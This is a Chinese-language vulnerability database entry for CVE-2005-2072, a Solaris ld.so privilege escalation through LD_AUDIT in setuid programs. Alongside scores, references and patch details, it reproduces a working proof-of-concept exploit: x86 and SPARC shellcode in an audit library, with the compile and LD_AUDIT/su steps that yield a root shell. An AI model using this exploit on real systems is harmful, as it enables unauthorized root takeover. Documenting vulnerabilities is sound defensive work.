CVE-2005-2072
CVSS7.2
发布时间 :2005-06-29 00:00:00
修订时间 :2011-10-11 00:00:00
NMCOES    

[原文]The runtime linker (ld.so) in Solaris 8, 9, and 10 trusts the LD_AUDIT environment variable in setuid or setgid programs, which allows local users to gain privileges by (1) modifying LD_AUDIT to reference malicious code and possibly (2) using a long value for LD_AUDIT.


[CNNVD]Sun Solaris 权限提升漏洞(CNNVD-200506-240)

        Solaris是一款由Sun开发和维护的商业性质UNIX操作系统。
        Sun Solaris运行时连接器对某些环境变量没有做正确检查,本地攻击者可能利用此漏洞提升自己的权限。
        起因是Solaris 9和10的ld.so在运行s[ug]id二进制程序时没有检查LD_AUDIT环境变量,导致以提升的权限运行任意代码。

- CVSS (基础分值)

CVSS分值: 7.2 [严重(HIGH)]
机密性影响: COMPLETE [完全的信息泄露导致所有系统文件暴露]
完整性影响: COMPLETE [系统完整性可被完全破坏]
可用性影响: COMPLETE [可能导致系统完全宕机]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: LOCAL [漏洞利用需要具有物理访问权限或本地帐户]
身份认证: NONE [漏洞利用无需身份认证]

- CWE (弱点类目)

CWE-264 [权限、特权与访问控制]

- CPE (受影响的平台与产品)

cpe:/o:sun:solaris:9.0::sparc
cpe:/o:sun:solaris:10.0::sparc
cpe:/o:sun:solaris:8.0
cpe:/o:sun:solaris:9.0::x86
cpe:/o:sun:solaris:8.0::x86

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2072
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-2072
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200506-240
(官方数据源) CNNVD

- 其它链接及资源

http://www.vupen.com/english/advisories/2005/0908
(VENDOR_ADVISORY)  VUPEN  ADV-2005-0908
http://www.securityfocus.com/bid/14074
(UNKNOWN)  BID  14074
http://www.opensolaris.org/jive/thread.jspa?messageID=3497
(UNKNOWN)  CONFIRM  http://www.opensolaris.org/jive/thread.jspa?messageID=3497
http://sunsolve.sun.com/search/document.do?assetkey=1-26-101794-1
(UNKNOWN)  SUNALERT  101794
http://securitytracker.com/id?1014537
(UNKNOWN)  SECTRACK  1014537
http://secunia.com/advisories/15841
(VENDOR_ADVISORY)  SECUNIA  15841
http://lists.grok.org.uk/pipermail/full-disclosure/2005-June/034738.html
(UNKNOWN)  FULLDISC  20050628 Solaris 9/10 ld.so fun
http://lists.grok.org.uk/pipermail/full-disclosure/2005-June/034731.html
(UNKNOWN)  FULLDISC  20050628 Solaris 9/10 ld.so fun
http://lists.grok.org.uk/pipermail/full-disclosure/2005-June/034730.html
(UNKNOWN)  FULLDISC  20050628 Solaris 9/10 ld.so fun

- 漏洞信息

Sun Solaris 权限提升漏洞
高危 权限许可和访问控制
2005-06-29 00:00:00 2006-06-15 00:00:00
本地  
        Solaris是一款由Sun开发和维护的商业性质UNIX操作系统。
        Sun Solaris运行时连接器对某些环境变量没有做正确检查,本地攻击者可能利用此漏洞提升自己的权限。
        起因是Solaris 9和10的ld.so在运行s[ug]id二进制程序时没有检查LD_AUDIT环境变量,导致以提升的权限运行任意代码。

- 公告与补丁

        目前厂商已经发布了升级补丁以修复这个安全问题,补丁下载链接:
        http://sunsolve.sun.com/security

- 漏洞信息 (1073)

Solaris 9 / 10 ld.so Local Root Exploit (1) (EDBID:1073)
solaris local
2005-06-28 Verified
0 Przemyslaw Frasunek
N/A [点击下载]
/*
- SunOS 5.10 Generic i86pc i386 i86pc
- SunOS 5.9 Generic_112233-12 sun4u

It does NOT work on:

SunOS 5.8 Generic_117350-02 sun4u sparc

Example on unpatched Solaris 10 (AMD64):

atari:venglin:~> cat dupa.c
*/

static char sh[] =
"\x31\xc0\xeb\x09\x5a\x89\x42\x01\x88\x42\x06\xeb\x0d\xe8\xf2\xff\xff\xff\x9a\x01\x01\x01\x01\x07\x01\xc3\x50\xb0\x17\xe8\xf0\xff\xff\xff\x31\xc0\x68\x2f\x73\x68\x5f\x68\x2f\x62\x69\x6e\x88\x44\x24\x07\x89\xe3\x50\x53\x8d\x0c\x24\x8d\x54\x24\x04\x52\x51\x53\xb0\x0b\xe8\xcb\xff\xff\xff";

int la_version() {
       void (*f)();
       f = (void*)sh;
       f();
       return 3;
}

/*
atari:venglin:~> gcc -fPIC -shared -o /tmp/dupa.so dupa.c
atari:venglin:~> setenv LD_AUDIT /tmp/dupa.so
atari:venglin:~> su

# id
uid=0(root) gid=10(staff)
*/

// milw0rm.com [2005-06-28]
		

- 漏洞信息

17614
Solaris Runtime Linker (ld.so.1) Arbitrary Privileged Code Execution
Local Access Required Input Manipulation
Loss of Confidentiality, Loss of Integrity
Exploit Public

- 漏洞描述

A local overflow exists in Sun Solaris Runtime Linker. The runtime linker, ld.so.1, fails to check the LD_AUDIT environment variable resulting in a buffer overflow. With a specially crafted request, an attacker can execute arbitrary code with elevated privileges resulting in a loss of confidentiality and/or integrity.

- 时间线

2005-06-27 Unknow
2005-06-27 Unknow

- 解决方案

Upgrade to version as indicated by vendor advisory, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- 相关参考

- 漏洞作者

- 漏洞信息

Sun Solaris Runtime Linker LD_AUDIT Privilege Escalation Vulnerability
Design Error 14074
No Yes
2005-06-28 12:00:00 2007-11-15 12:38:00
Przemyslaw Frasunek <venglin@freebsd.lublin.pl> is credited with the discovery of this vulnerability.

- 受影响的程序版本

Sun Solaris 9_x86
Sun Solaris 9
Sun Solaris 8_x86
Sun Solaris 8_sparc
Sun Solaris 10.0_x86
Sun Solaris 10
SchilliX SchilliX 0.1
Avaya Interactive Response 1.3
Avaya Interactive Response 1.2.1
Avaya Interactive Response
Avaya CMS Server 13.0
Avaya CMS Server 12.0
Avaya CMS Server 11.0
Avaya CMS Server 9.0
Avaya CMS Server 8.0

- 漏洞讨论

The Sun Solaris runtime linker is susceptible to a privilege escalation vulnerability.

Runtime linkers in most operating systems are designed to ignore LD_* environment variables when executing setuid or setgid binaries. The manual page describing 'ld.so' for Sun Solaris also states that certain precautions are taken when setuid or setgid binaries are executed. Reportedly, these precautions are not properly followed when LD_AUDIT is used.

Exploiting this vulnerability allows local attackers to gain superuser privileges on affected computers.

- 漏洞利用

An exploit is not required, but proof-of-concept demonstration code was provided.

For Solaris 10 on amd64:
static char sh[] =
"\x31\xc0\xeb\x09\x5a\x89\x42\x01\x88\x42\x06\xeb\x0d\xe8\xf2\xff\xff\xff\x9a\x01\x01\x01\x01\x07\x01\xc3\x50\xb0\x17\xe8\xf0\xff\xff\xff\x31\xc0\x68\x2f\x73\x68\x5f\x68\x2f\x62\x69\x6e\x88\x44\x24\x07\x89\xe3\x50\x53\x8d\x0c\x24\x8d\x54\x24\x04\x52\x51\x53\xb0\x0b\xe8\xcb\xff\xff\xff";

int la_version() {
void (*f)();
f = (void*)sh;
f();
return 3;
}

For Solaris 9 SPARC:
char sh[] =
/* setuid() */
"\x90\x08\x3f\xff\x82\x10\x20\x17\x91\xd0\x20\x08"
/* execve() */
"\x20\xbf\xff\xff\x20\xbf\xff\xff\x7f\xff\xff\xff\x90\x03\xe0\x20"
"\x92\x02\x20\x10\xc0\x22\x20\x08\xd0\x22\x20\x10\xc0\x22\x20\x14"
"\x82\x10\x20\x0b\x91\xd0\x20\x08/bin/ksh";

int la_version() {
void (*f)();
f = (void*)sh;
f();
return 3;
}

To compile:
gcc -fPIC -shared -o /tmp/dupa.so dupa.c

And to exploit:
export LD_AUDIT=/tmp/dupa.so
su

UPDATE: Core Security Technologies has developed a working commercial exploit for its CORE IMPACT product. This exploit is not otherwise publicly available or known to be circulating in the wild.

The following proof of concept (Schily-Root.tar) has been provided by KF (lists) (kf_lists@digitalmunition.com) for SchilliX:

- 解决方案

Sun has updated Sun Alert ID 101794 as well as fixes for Solaris 8 and 9 for both x86 and SPARC platforms, and a fix for Solaris 10 on the SPARC platform.

Sun has provided Interim Diagnostic Relief patch IDR120360-01 to address this issue for Solaris 10 on the x86 platform. Please see the referenced advisory for more information.

Avaya has released advisory ASA-2005-162 to identify vulnerable Avaya packages. Avaya is currently investigating this issue; more information about fixes will be released in the future.

Sun patch 118345-05 for Solaris 10 x86 has been released.


Sun Solaris 8_x86

Sun Solaris 8_sparc

Sun Solaris 9

Sun Solaris 9_x86

Sun Solaris 10

Sun Solaris 10.0_x86

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站